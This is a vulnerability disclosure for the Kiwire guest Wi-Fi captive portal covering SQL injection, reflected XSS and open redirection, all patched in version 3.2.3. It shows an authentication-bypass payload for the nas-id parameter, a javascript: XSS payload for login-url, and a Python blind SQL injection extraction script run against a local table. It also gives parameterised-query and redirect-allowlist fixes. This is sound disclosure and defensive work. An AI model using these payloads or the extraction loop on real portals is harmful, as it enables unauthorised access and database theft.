
Vulnerability Disclosure: Kiwire Captive Portal

CVE-2025-11188

Josh Clan, Senior Security Consultant

During a recent penetration test, LRQA identified three vulnerabilities in Kiwire Captive Portal, a guest Wi-Fi solution developed by SynchroWeb that provides Internet access in public venues such as hotels, malls, and airports. When users connect to the guest Wi-Fi, a captive portal prompts them to register with a valid mobile number and SMS one-time password (OTP) to gain access. 

The vulnerabilities – SQL Injection (CVE-2025-11188), Cross-site Scripting (CVE-2025-11189), and Open Redirection (CVE-2025-11190) – were found in the authentication endpoint used during the Wi-Fi login flow. All three have been patched by SynchroWeb as of September 2025. 

This post walks through each finding in detail. It's aimed at penetration testers, application security engineers, and anyone responsible for deploying or managing captive portal solutions. 

SQL Injection CVE-2025-11188 

During testing, it was observed that on connection to the Wi-Fi the client is sent to the following endpoint, which authenticates the device against the backend so that the user is not asked to re-enter their mobile number and OTP. 

https://guestwifi.target.com/login/huawei-wlc?&ap-mac=6c71d2<mac>&redirect-url=&ssid=Guest_WiFi&user-ip=192.168.100.156&user-mac=189341<mac>&nas-id=PYLGWIFIWAC01&login-url=www.google.com 

The nas-id parameter in this request was identified as being vulnerable to SQL injection. 

Submitting an invalid nas-id resulted in an application error. 


Figure 1: Invalid nas-id triggers an error response 

By appending a Boolean OR condition (' OR '1'='1) to the nas-id value, the check was bypassed and the user was authenticated to the guest Wi-Fi network, confirming a Boolean-based blind SQL injection vulnerability. 


Figure 2: Append OR operand to bypass nas-id check with a TRUE condition 

When an attacker submits &nas-id=PYLGWIFIWAC02' OR '1'='1 (URL-encoded in the actual request), the resulting query takes the form SELECT * FROM devices WHERE nas_id = 'PYLGWIFIWAC02' OR '1'='1'. The OR '1'='1' clause is always true, so a row is returned and authentication succeeds even though PYLGWIFIWAC02 is not a valid NAS identifier. 

A Python proof-of-concept script was developed to exploit the blind SQL injection. 

The script performs Boolean-based blind SQL injection through the vulnerable nas-id parameter, extracting database information one character at a time. The application's error response serves as the oracle: if a guessed character produces a successful login instead of the error message, the guess was correct. 


Figure 3: Sample output 
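The following is an added example, not LRQA's PoC or SynchroWeb's code, that reproduces the technique described above against a constructed in-memory SQLite table. The devices table, its single NAS row and the patched_lookup function are assumptions for illustration; the Kiwire schema and query are not public. vulnerable_lookup models the concatenated query and error-or-success behaviour, extract implements the char-by-char Boolean inference, and patched_lookup shows why a bound parameter closes the hole.

```python
import sqlite3
import string

# Constructed stand-in for the portal's NAS table (assumption: the real schema
# is not public; the write-up only shows a query against a `devices` table).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE devices (nas_id TEXT NOT NULL, site TEXT)")
conn.execute("INSERT INTO devices VALUES ('PYLGWIFIWAC01', 'lobby')")
conn.commit()


def vulnerable_lookup(nas_id):
    """Model of the flawed backend: nas-id is concatenated into the query and the
    client is authenticated when a row comes back. Returns True on success and
    False when the portal would show its error page (no row, or the SQL failed)."""
    query = f"SELECT * FROM devices WHERE nas_id = '{nas_id}'"
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def patched_lookup(nas_id):
    """Same lookup with a bound parameter: the value is data, never SQL syntax."""
    row = conn.execute("SELECT * FROM devices WHERE nas_id = ?", (nas_id,)).fetchone()
    return row is not None


def extract(oracle, expression, alphabet=string.printable[:-5], max_len=64):
    """Boolean-based blind extraction of a SQL scalar `expression`, one character
    at a time, through the nas-id parameter. For every position we try each
    alphabet character; the guess is right when the oracle reports a successful
    login instead of the error page. No match at a position means the string
    has ended."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            literal = ch.replace("'", "''")  # keep the injected literal well formed
            # The backend appends the closing quote, exactly as with ' OR '1'='1
            payload = f"x' OR substr(({expression}),{pos},1)='{literal}"
            if oracle(payload):
                result += ch
                break
        else:
            break
    return result


if __name__ == "__main__":
    bypass = "PYLGWIFIWAC02' OR '1'='1"
    print("vulnerable, bypass payload :", vulnerable_lookup(bypass))
    print("patched,    bypass payload :", patched_lookup(bypass))
    first_table = "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"
    print("extracted table name       :", extract(vulnerable_lookup, first_table))
    print("against patched lookup     :", repr(extract(patched_lookup, first_table)))
```

Against the real portal the oracle would be an HTTP request per guess, with the error page (Figure 1) as the "false" signal and a successful login as "true"; the inference loop is otherwise the same. Note that the extraction recovers nothing against the parameterised lookup because the injected text is compared literally to nas_id and never alters the query.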

 

Cross-site Scripting (XSS) CVE-2025-11189 

The same endpoint detailed above includes the login-url parameter, which controls the redirection upon successful authentication. 

https://guestwifi.target.com/login/huawei-wlc?&ap-mac=6c71d2<mac>&redirect-url=&ssid=Guest_WiFi&user-ip=192.168.100.156&user-mac=189341<mac>&nas-id=PYLGWIFIWAC01&login-url=www.google.com 

Testing revealed that login-url is vulnerable to reflected Cross-site Scripting (XSS). The application neither validates nor sanitizes the parameter and reflects it into the redirect it issues after login. 

Submitting the payload javascript:alert(document.domain) in the login-url parameter results in JavaScript execution in the victim's browser upon redirection. Since browsers will not follow a javascript: URL supplied in an HTTP Location header, the fact that this payload fires indicates the post-login redirect is carried out client-side, with the parameter written into the page. 


Figure 4: XSS payload trigger in the login-url parameter 

In a real-world scenario, an attacker could craft a malicious Wi-Fi login URL containing a JavaScript payload in the login-url parameter and distribute it through a phishing campaign or by spoofing the captive portal landing page. When a victim clicks the link and authenticates, the XSS payload executes in their browser within the context of the captive portal's domain. This could allow an attacker to steal session tokens, capture credentials entered during the login flow, or redirect users to a convincing phishing page – all under a trusted domain that users have no reason to question, since they expect to interact with it as part of connecting to Wi-Fi. 

The risk is heightened by the context in which captive portals operate: users are accustomed to being redirected, prompted for input, and interacting with unfamiliar login pages, making social engineering via XSS particularly effective in this environment. 

Open Redirection CVE-2025-11190 

The login-url parameter was also found to be vulnerable to open redirection. By modifying this parameter to point to an attacker-controlled domain, authenticated users could be redirected to a malicious website after successful login. 

https://guestwifi.target.com/login/huawei-wlc?&ap-mac=6c71d2<mac>&redirect-url=&ssid=Guest_WiFi&user-ip=192.168.100.156&user-mac=189341<mac>&nas-id=PYLGWIFIWAC01&login-url=www.google.com 

This behavior could be abused for phishing attacks or to chain with other client-side exploits. 


Figure 5: Open redirection vulnerability in the login-url parameter 
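Both the XSS and the open redirection above stem from the same root cause: login-url is trusted as a redirect target. The following server-side check is an added example (not SynchroWeb's fix, whose details the advisory does not describe) of the allowlist approach a portal can apply before redirecting. The allowed hosts and default URL are assumptions chosen to match the legitimate value in the request (www.google.com).

```python
from urllib.parse import urlsplit, urlunsplit

# Assumptions for the example: the portal knows which destinations it is willing
# to send users to after login, and where to send them otherwise.
ALLOWED_HOSTS = frozenset({"www.google.com", "guestwifi.example.com"})
DEFAULT_URL = "https://guestwifi.example.com/welcome"


def safe_login_url(value, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_URL):
    """Return a redirect target that is safe to emit, or `default` if the supplied
    login-url cannot be verified. Rejects non-http(s) schemes (javascript:, data:),
    protocol-relative and userinfo-bearing URLs, and any host not on the allowlist."""
    if not value:
        return default
    candidate = value.strip()
    # Browsers strip control characters and rewrite backslashes ("java\tscript:",
    # "https:\\evil.example"), so refuse anything containing them outright.
    if "\\" in candidate or any(ord(ch) < 0x20 for ch in candidate):
        return default
    parts = urlsplit(candidate)
    # The legitimate request carries a bare host ("www.google.com"); treat it as https.
    if not parts.scheme and not parts.netloc:
        parts = urlsplit("https://" + candidate)
    if parts.scheme not in ("http", "https"):  # urlsplit lowercases the scheme
        return default                          # blocks javascript:, data:, and //host
    if parts.username is not None or parts.password is not None:
        return default                          # blocks https://www.google.com@evil.example
    try:
        port = parts.port
    except ValueError:
        return default
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return default
    netloc = host if port is None else f"{host}:{port}"
    # Re-serialise from parsed parts so only the validated components survive.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    for sample in ("www.google.com",
                   "javascript:alert(document.domain)",
                   "https://evil.example/phish",
                   "https://www.google.com@evil.example/"):
        print(f"{sample!r:45} -> {safe_login_url(sample)}")
```

Rebuilding the URL from parsed components, rather than echoing the raw parameter, also removes the reflection that made the XSS possible; whatever performs the client-side redirect then only ever sees an allowlisted http(s) URL.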

Disclosure Process  

  • 17 July 2025 – Vulnerabilities discovered during penetration test 
  • 22 July 2025 – Reported to SynchroWeb 
  • 19 September 2025 – SynchroWeb released a patch in Kiwire version 3.2.3 
  • 09 October 2025 – CVEs assigned by MITRE 
  • 10 October 2025 – Coordinated public disclosure via CERT/CC (VU#887923) 

Users running Kiwire Captive Portal should update to version 3.2.3 or later. SynchroWeb's security advisory is available at synchroweb.com/release-notes/kiwire/security. 

 
